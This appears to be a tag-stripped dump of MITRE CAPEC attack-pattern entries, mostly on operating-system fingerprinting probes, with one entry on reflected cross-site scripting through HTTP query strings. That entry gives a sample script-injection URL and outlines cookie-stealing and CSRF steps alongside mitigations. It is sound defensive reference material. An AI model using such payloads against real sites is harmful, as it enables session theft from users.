Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in IP-based techniques for the purpose of fingerprinting operating systems on the network. By interrogating a particular IP stack implementation with IP segments that deviate from the ordinary or expected rules of RFC 791, an attacker can construct a fingerprint of unique behaviors for the target operating system. When this set of behaviors is analyzed against a database of known fingerprints, an attacker can make reliable inferences about the operating system type and version.
Network Layer
Server-side
Host
Uses Protocol
The ability to send and receive TCP segments from a target in order to identify a particular TCP stack implementation.
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
312
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in TCP stack fingerprinting techniques to determine the type and version of operating systems on the network. TCP Fingerprinting involves manipulating portions of the TCP header or other characteristics in order to elicit a unique and identifiable response from an operating system. This response is compared against a database of known operating system fingerprints and a guess about the operating system type and version is made.
Network Layer
Transport Layer
Application Layer
Server-side
Host
Service
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
The ability to send and receive TCP segments from a target in order to identify a particular TCP stack implementation.
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
312
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in ICMP stack fingerprinting techniques to determine the operating system type and version of a remote target. The role of ICMP as an ubiquitous diagnostic messaging protocol means that ICMP fingerprinting techniques are applicable to almost any internet host in a similar manner as TCP. ICMP fingerprinting techniques involve the generation of ICMP messages and analyzing the responses. This method is limited in that most firewalls are configured to block ICMP messages for security reasons, so it is most effective when used on an internal network segment. OS fingerprints using ICMP usually involve multiple different probes as the information returned from any one probe is usually insufficient to support a reliable OS inference.
Network Layer
Server-side
Host
RFC 792
Type
The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated.
8
ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message.
Uses Protocol
The ability to generate and analyze ICMP messages from a target. In cases where certain message types are blocked by a firewall, the reliability of ICMP fingerprinting declines sharply.
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
312
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
J. Postel
RFC792 - Internet Control Messaging Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc792.html
R. Braden, Ed.
RFC1122 - Requirements for Internet Hosts - Communication Layers
October 1989
http://www.faqs.org/rfcs/rfc1122.html
Ofir Arkin
A Remote Active OS Fingerprinting Tool using ICMP
The Sys-Security Group
April 2002
http://ofirarkin.files.wordpress.com/2008/11/login.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe analyzes the IP 'ID' field sequence number generation algorithm of a remote host. Operating systems generate IP 'ID' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP 'ID' sequence number analysis:
1. IP 'ID' Sequencing: Analyzing the IP 'ID' sequence generation algorithm for one protocol used by a host.
2. Shared IP 'ID' Sequencing: Analyzing the packet ordering via IP 'ID' values spanning multiple protocols, such as between ICMP and TCP.
Network Layer
Server-side
Host
Identifier
The Identifier field 'ID' is a 16 bit field used for fragment reassembly.
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
314
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'ID' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP 'ID' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message.
Transport Layer
Server-side
Host
Identifier
The Identifier field 'ID' is a 16 bit field used for fragment reassembly.
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
314
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'DF' (Don't Fragment) bit in a response packet. An attacker sends a UDP datagram with the DF bit set to a closed port on the remote host to observe whether the 'DF' bit is set in the response packet. Some operating systems will echo the bit in the ICMP error message while others will zero out the bit in the response packet.
Transport Layer
Server-side
Host
Flags
The Don't Fragment Flag indicates that a datagram should not be fragmented under any circumstance.
DF
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
314
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
A variant of cross-site scripting called "reflected" cross-site scripting, the HTTP Query Strings attack consists of passing a malicious script inside an otherwise valid HTTP request query string. This is of significant concern for sites that rely on dynamic, user-generated content such as bulletin boards, news sites, blogs, and web enabled administration GUIs. The malicious script may steal session data, browse history, probe files, or otherwise execute attacks on the client side. Once the attacker has prepared the malicious HTTP query it is sent to a victim user (perhaps by email, IM, or posted on an online forum), who clicks on a normal looking link that contains a poison query string. This technique can be made more effective through the use of services like http://tinyurl.com/, which makes very small URLs that will redirect to very large, complex ones. The victim will not know what he is really clicking on.
Spider
Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds.
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.
env-Web
URL parameters are used by the application or the browser (DOM)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.
env-Web
Application could use POST variable as GET inside the application. Therefore, looking for POST parameters and adding them to the query string.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Attempt variations on input parameters
Possibly using an automated tool, an attacker requests variations on the URLs he spidered before. He sends parameters that include variations of payloads. He records all the responses from the server that include unmodified versions of his script.
Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.
env-Web
Use a proxy tool to record results of manual input of XSS probes in known URLs.
env-Web
The output of pages includes some form of a URL parameter. E.g., ?error="File not Found" becomes "File not Found" in the title of the web page.
env-Web
Input parameters become part of JavaScript, VBScript, or other script in a web page.
env-Web
Nothing is returned to the web page. It may be a stored XSS. The unique identifier from the probe helps to trace the flow of the possible XSS.
env-Web
The attacker's cross-site scripting string is repeated back verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, script, etc.)
All HTML-sensitive characters are consistently re-encoded before being sent to the web browser.
Some sensitive characters are consistently encoded, but others are not.
Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Do not embed user-controllable input generated HTTP headers
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation.
High
High
Injection
Protocol Manipulation
http://user:host@example.com:8080/oradb<script>alert('Hi')</script>
Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an attacker would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.
Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the attacker, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.
Low
To place malicious payload on server via HTTP
High
Exploiting any information gathered by HTTP Query on script host
Ability to send HTTP post to scripting host and collect output
Design: Use browser technologies that do not allow client side scripting.
Design: Utilize strict type, character, and encoding enforcement
Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Perform input validation for all remote content, including remote and user-generated content
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Session tokens for specific host
Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.
Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode
Confidentiality
Read application data
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Script delivered through standard web server, such as a web server with user-generated content.
HTTP Request Query String
Client web browser where script is executed
Client web browser may be used to steal session data, passwords, cookies, and other tokens.
79
Targeted
84
Targeted
85
Targeted
20
Targeted
86
Targeted
692
Targeted
697
Targeted
713
Targeted
71
Targeted
1000
Attack Pattern
ChildOf
18
1000
Attack Pattern
ChildOf
220
Exploitation
High
High
Low
Client-Server
n-Tier
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.
1. The attacker sends a probe packet to the remote host to identify if timestamps are present.
2. If the remote host is using timestamp, the attacker sends several requests and records the timestamp values.
3. The attacker analyzes the timestamp values and determines an average increments per second in the timestamps for the target.
3. The attacker compares this result to a database of known TCP timestamp increments for a possible match.
Network Layer
Server-side
Host
Options Field
Options may occupy space at the end of the TCP header and are a multiple of 8 bits in length. All options are included in the checksum.
Uses Protocol
The target OS must support the TCP timestamp option in order to obtain a fingerprint.
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows:
1. The Sequence Number generated by the target is Zero.
2. The Sequence Number generated by the target is the same as the acknowledgement number in the probe
3. The Sequence Number generated by the target is the acknowledgement number plus one
3. The Sequence Number is any other non-zero number.
Transport Layer
Server-side
Host
Sequence Number
The sequence number of the first data octet a TCP segment.
ACK
RFC 792
Acknowledgement Number
If the ACK control bit is set this field contains the starting value of the next sequence number the sender of the segment is expecting to receive.
ACK
Uses Protocol
The ability to send an TCP ACK segment to an open port and receive a response back containing a TCP sequence number.
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 55-56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.
Transport Layer
Server-side
Host
Sequence Number
The sequence number of the first data octet in a segment (except when a SYN flag is present). If SYN is present the sequence number is the initial sequence number (ISN) of the connection and the first data octet is ISN+1. The sequence number consists of 32 bits.
For purposes of Sequence number analysis the data portion of the packet is either empty or ignored.
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.
Transport Layer
Server-side
Host
Sequence Number
The sequence number of the first data octet in a segment (except when a SYN flag is present). If SYN is present the sequence number is the initial sequence number (ISN) of the connection and the first data octet is ISN+1. The sequence number consists of 32 bits.
For purposes of Sequence number analysis the data portion of the packet is either empty or ignored.
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.
Transport Layer
Server-side
Host
Sequence Number
The sequence number of the first data octet in a segment (except when a SYN flag is present). If SYN is present the sequence number is the initial sequence number (ISN) of the connection and the first data octet is ISN+1. The sequence number consists of 32 bits.
For purposes of Sequence number analysis the data portion of the packet is either empty or ignored.
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
Gordon "Fyodor" Lyon
The Art of Port Scanning
Volume: 7, Issue. 51
Phrack Magazine
1997
http://www.phrack.org/issues.html?issue=51&id=11#article
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.
Network Layer
Server-side
Host
RFC 3168
Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field.
The not-ECT codepoint '00' indicates a packet that is not using ECN.
00
RFC 3168
Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field.
The ECT(1) bit. Binary flag '01' indicates a packet is using ECN(1) channel.
01
RFC 3168
Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field.
The ECT(0) bit. Binary flag '10' indicates a packet is using ECT(0) channel.
10
RFC 3168
Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field.
The CE codepoint '11' is set by a router to indicate congestion to the end nodes.
11
Uses Protocol
RFC 3168
Reserved Field
ECN-Echo flag. The ECN-Echo flag is assigned to Bit 9 in the Reserved field of the TCP header.
ECE
RFC 3168
Reserved Field
CWR Flag. The CWR flag is assigned to Bit 8 in the Reserved field of the TCP header.
CWR
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the "connected" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection.
Transport Layer
Server-side
Host
Window
The 16 bit window indicates an allowed number of octets that the sender may transmit before receiving further permission.
ACK
Acknowledgement Number
If the ACK control bit is set this field contains the value of the next sequence number the sender of the segment is expecting to receive. Once a connection is established this is always sent.
ACK
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.
Transport Layer
Server-side
Host
Options Field
The Options Field allows a TCP segment to specify specific requirements for its routing or may contain information such as a timestamp. Options may occupy space at the end of the TCP header and are a multiple of 8 bits in length. All options are included in the checksum.
Uses Protocol
Low
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Hide activities
1000
Attack Pattern
ChildOf
315
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pg. 56
6th Edition
McGraw Hill
2009
Defense Advanced Research Projects Agency Information Processing Techniques Office
Information Sciences Institute University of Southern California
RFC793 - Transmission Control Protocol
Defense Advanced Research Projects Agency (DARPA)
September 1981
http://www.faqs.org/rfcs/rfc793.html
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Chapter 8. Remote OS Detection
3rd "Zero Day" Edition,
Insecure.com LLC
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.
Transport Layer
Server-side
Host
